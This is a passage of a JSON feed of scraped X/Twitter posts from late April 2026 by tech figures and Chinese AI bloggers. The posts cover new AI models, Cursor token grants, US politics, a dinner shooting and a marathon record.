Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://x.com/HarryStebbings/status/2048486182904852537", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. \n\nThe result, predictably, is that they’ve stopped waiting for the lease to expire and started buying their own buildings.\nWhat’s happening now is qualitatively different from the grumbling of 2017-2019. Back then, European leaders still believed the relationship was cyclical – that America would eventually sober up and the old architecture would reassemble itself. \n\nThat belief is gone. Greenland changed everything. For ever. What replaced it are structural decisions: \n\nGerman rearmament on a scale not seen since before reunification, French-led European defence coordination that pointedly excludes Washington, South Korean quiet conversations about indigenous nuclear deterrence, Japanese defence spending hitting levels that would have been politically unthinkable five years ago.\n\nThe crucial dynamic is that these shifts generate their own momentum. A German arms industry rebuilt to supply a European force doesn’t get mothballed when the next US president calls. A generation of European defence planners trained to operate without American command integration doesn’t unlearn that. Trade relationships rerouted through new corridors don’t spontaneously return to their old paths just because someone in Washington eventually extends an olive branch.\n\nTrump appears to have understood American power as a static asset – something you could spend down for short-term leverage without diminishing the underlying account. \n\nWhat his allies understood, and what he didn’t, is that the asset was always relational. The moment they stopped believing in it, the balance sheet changed permanently.\nThe irony is almost classical. He wanted to make America’s allies pay more for American protection. Instead, he convinced them to stop needing it.", + "url": "https://x.com/ylecun/status/2048482084646240560", + "published_at": "2026-04-26T19:19:22+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://x.com/ylecun/status/2048469956627468510", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://x.com/ylecun/status/2048453901930660058", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? \n\nHell no, right? \n\nBut the answer is actually \"hell yes\" because it's cars. \n\nYou probably got in one today and never even thought it could kill you. You normalized the risk so easily.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. \n\nIt's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nSuperintelligent machines can't come fast enough because the real problem is not intelligence in the world.\n\nIt's the utter lack of it.", + "url": "https://x.com/ylecun/status/2048433973177573559", + "published_at": "2026-04-26T16:08:11+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://x.com/ylecun/status/2048432684930654430", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://x.com/sama/status/2048428561481265539", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://x.com/sama/status/2048426122854228141", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://x.com/HarryStebbings/status/2048418806867870115", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Pinned: Been testing NanoClaw for a few days, hooked it up to OpenRouter's free inclusionai/ling-2.6-1t:free model. The speed is absolutely wild.\n\nNanoClaw is already lightweight and snappy. Add @AntLingAGI's blazing-fast inference to the mix, and you get near-instant responses. Perfect combo!", + "url": "https://x.com/dingyi/status/2048416578396655905", + "published_at": "2026-04-26T14:59:04+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://x.com/paulg/status/2048413815675539816", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://x.com/paulg/status/2048413578789634100", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "牛逼,卡神又出教程了\n\n4美分/天、KiteSim香港卡,免实名+独享虚拟号\n\n马上跟着教程申请一张!!!", + "url": "https://x.com/gkxspace/status/2048412096665145411", + "published_at": "2026-04-26T14:41:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://x.com/paulg/status/2048411898081583547", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://x.com/paulg/status/2048411021329453562", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://x.com/HarryStebbings/status/2048400836024283246", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://x.com/ylecun/status/2048399621492236615", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://x.com/paulg/status/2048396013816152216", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》\n @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。\n\n 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。\n 2. 0xAA @0xAA_Science 北大计算机博士,WTF Academy创始人。\n 3. 比特币橙子 @oragnes 比特币持有者、加密投资人,同时热衷 AI 与 Vibe Coding,自建了 AI Agents 工具平台 OwlClawHub。\n 4. 铁锤人 @lxfater AI博主,用AI协助创业,维护GitHub 3w star项目。\n 5. 雪踏乌云 @Pluvio9yte 大厂程序员,专注分享 Vibe Coding、AI 编程与出海实战干货。\n 6. 凡人小北 @frxiaobei 商业与管理咨询顾问、AI 战略顾问,长期在真实业务中实践 AIGC 落地。\n 7. Berryxia @berryxia 专注构建AI工具、系统Prompt,热爱设计与分享Prompt。\n 8. 奶昔🥤 @realNyarime Naixi Networks创始人,专注eSIM与奶昔论坛。\n 9. Ding @dingyi 产品设计师,运营 SaasPick、TopFeed 等多个独立产品,拥有15万粉丝。\n 10. CuiMao @CuiMao AI开发者博主,专注深度学习、NVIDIA与ComfyUI,建免费AI学习群。\n 11. Leo @runes_leo AI × Crypto 独立构建者,Runesgang 符文堂创始人,专注比特币生态与链上量化研究。\n 12. 泊舟 @bozhou_ai 2.1万粉AI博主,AI程序员&Vibe编码者,专注构建Agent与Prompt。\n 13. Jason Zhu @GoSailGlobal 独立开发者,专注 SaaS 出海与 AI 内容分享,并创建了 Agent Skills 聚合站。\n 14. 余温 @gkxspace AI博主,05年连续创业者,专注AI产品构建与商业化,项目营收7位数+。\n 15. Steven Lynn @Stv_Lynn FirstLabAI主持人与Crazy Saturday活动主办者。", + "url": "https://x.com/bozhou_ai/status/2048390603030032670", + "published_at": "2026-04-26T13:15:51+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So DESIGN.md files are basically Tailwind base CSS files?\n\nhttps://designdotmd.directory/", + "url": "https://x.com/dingyi/status/2048386895995191344", + "published_at": "2026-04-26T13:01:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵", + "url": "https://x.com/bozhou_ai/status/2048386685399142532", + "published_at": "2026-04-26T13:00:17+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的!\n\n2:但是甲方需要 4K 图。或者 PSD 图层!\n\n3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。\nMD 居然给我做了!改给了我一个分层压缩包!\n\n4:里面的图片居然是 4K 尺寸的!\n\n5:所以我们能通过这个方法获得 GPT 的 4K 图片!", + "url": "https://x.com/frxiaobei/status/2048366332639674706", + "published_at": "2026-04-26T11:39:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Design 虽好,但是额度不够用啊😮‍💨", + "url": "https://x.com/frxiaobei/status/2048356561131905177", + "published_at": "2026-04-26T11:00:35+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI", + "url": "https://x.com/frxiaobei/status/2048319988826820941", + "published_at": "2026-04-26T08:35:15+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "都快猝死了烧了两天才 $695,靠 human in the loop 一个月肯定是烧不完 $10000 的。\n\n突然发现他们的 Cloud agents 很好用,云端就不会因为本地机器的性能问题卡住了,还能执行自动化。再加上这个 multitask,应该可以在一个月内花光 token 了。", + "url": "https://x.com/dingyi/status/2048309013675216966", + "published_at": "2026-04-26T07:51:39+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。\n\n另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。\n\nhttps://github.com/AmazingAng/auth2api", + "url": "https://x.com/0xAA_Science/status/2048296373569941533", + "published_at": "2026-04-26T07:01:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://x.com/ylecun/status/2048293118781296734", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "中国群友的幻想集合:\n\n1. 自动化做自媒体\n2. 自动炒股票赚钱\n\n这些都是普通人都能参与的玩意", + "url": "https://x.com/lxfater/status/2048292547966210069", + "published_at": "2026-04-26T06:46:13+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "每次刷到这张图都悲从中来。", + "url": "https://x.com/frxiaobei/status/2048284683767812133", + "published_at": "2026-04-26T06:14:58+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "早上去爱康国宾做了个年度体检,往年都会直接丢给 chatgpt,今年直接小程序内用了爱康家的 ikkie 健康管家。\n\n虽然做的一言难尽,但医疗 AI 这条线很明显出现了一些底层的变化。\n\n以前那套拿着报告去问 ChatGPT 的玩法有个隐含的前提,问题是我自己定义的。\n现在逻辑完全反转, AI 拿到我的全量数据,然后反推出应该关心什么。\n\n在这个形态下我就转变成一个被持续监控和解释的对象。这听起来有点不舒服,但在医疗场景里这是合理的,因为绝大多数情况下我根本不知道该问什么。\n\n所以带来的就是 Prompt 在这个场景里开始失效\n为什么?\n因为 prompt 是把复杂现实压缩成一段文本。而我又描述不清楚,但是健康数据本来就是高维的跨时间的。我尝试一次性用 prompt 去描述信息损失是非常大。\n\n这也是为什么近半年会有 Agent 更懂自己的感觉,其实核心原因是长年累月的输入更真实了。\n\n随着数据的累积, ChatGPT 在人与 AI 的关系中扮演的角色也开始从信息解释器变成健康调度器。\n\n举个例子:\n一个异常指标,在传统 ChatGPT 流程里是解释 → 风险提示 → 建议去医院\n\n但在 AI 健康管家这种体系里理论上可以变成\n识别异常 → 判断风险等级 → 匹配历史数据 → 推荐复查 → 触发预约 → 跟踪结果\n\n也就是从一个认知闭环变成一个行动闭环。这一步是健康类 agent 真正有价值的地方(当然其他垂直场景都类似)\n\n但医疗 AI 还有那个老生常谈的问题,谁来承担责任。\n通用大模型理论上可以无限接近正确,实际上现在已经超越了所有的医生,但它不承担责任,所以它的输出永远是建议。\n\n所以在当前国家的体制下我更看到一些民营性质的医院先走出来。\n\n并且在整个链路上,数据的重要性也比想象中的还要大很多。", + "url": "https://x.com/frxiaobei/status/2048280586318672269", + "published_at": "2026-04-26T05:58:41+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "有什么 skill 能把一个设计系统拆解就好了,有吗?", + "url": "https://x.com/lxfater/status/2048264304261312720", + "published_at": "2026-04-26T04:53:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。\n\nopus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。", + "url": "https://x.com/0xAA_Science/status/2048254571622113742", + "published_at": "2026-04-26T04:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "嗨 @nikitabier @elonmusk\n\n你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。\n\n我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。", + "url": "https://x.com/wolfyxbt/status/2048250984644960630", + "published_at": "2026-04-26T04:01:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事!\n\n枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。", + "url": "https://x.com/0xAA_Science/status/2048229814172275062", + "published_at": "2026-04-26T02:36:56+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "好久不见,宝子们,近来可好啊", + "url": "https://x.com/chuxiaeth/status/2048229604784308266", + "published_at": "2026-04-26T02:36:06+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://x.com/sama/status/2048224374264885396", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽,川普又被枪击了 😱", + "url": "https://x.com/wolfyxbt/status/2048223317019316568", + "published_at": "2026-04-26T02:11:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://x.com/sama/status/2048165186482389253", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://x.com/sama/status/2048160448340767038", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://x.com/sama/status/2048160404376105179", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://x.com/ylecun/status/2048118689258487857", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/quote-bud…", + "url": "https://x.com/Stv_Lynn/status/2048109932751560818", + "published_at": "2026-04-25T18:40:34+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像", + "url": "https://x.com/Stv_Lynn/status/2048109929203212615", + "published_at": "2026-04-25T18:40:33+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/Stakka", + "url": "https://x.com/Stv_Lynn/status/2048109925612851296", + "published_at": "2026-04-25T18:40:32+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 2. 继续 push 一下 stekka\n之前没有做过移动端,很大一部分原因是 sonnet-3.5 时代还没法稳定生成 swift,一直在用 react native 做一些简单小应用\n现在发现主流 SOTA 模型已经能很稳定地产出 swift 了\n自动化测试也通过 AXE 搞定了✅", + "url": "https://x.com/Stv_Lynn/status/2048109922936910037", + "published_at": "2026-04-25T18:40:32+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Cursor 送的 10000 刀,我拿来做了什么\n\n昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录\n\n1. 写了个主页\n想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构\n(文案请忽略不代表最终效果)\n\n感觉吃上细糠了!", + "url": "https://x.com/Stv_Lynn/status/2048109919266852875", + "published_at": "2026-04-25T18:40:31+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: agent.creao.ai/signup?ref=Ws…", + "url": "https://x.com/gkxspace/status/2048070713601376712", + "published_at": "2026-04-25T16:04:44+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://x.com/ylecun/status/2048069805807128734", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://x.com/sama/status/2048062261584077149", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。", + "url": "https://x.com/wolfyxbt/status/2048056527731454048", + "published_at": "2026-04-25T15:08:21+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://x.com/paulg/status/2048043843690561556", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: x.com/gkxspace/status/204803…", + "url": "https://x.com/gkxspace/status/2048035672078844248", + "published_at": "2026-04-25T13:45:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。\n\n简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API 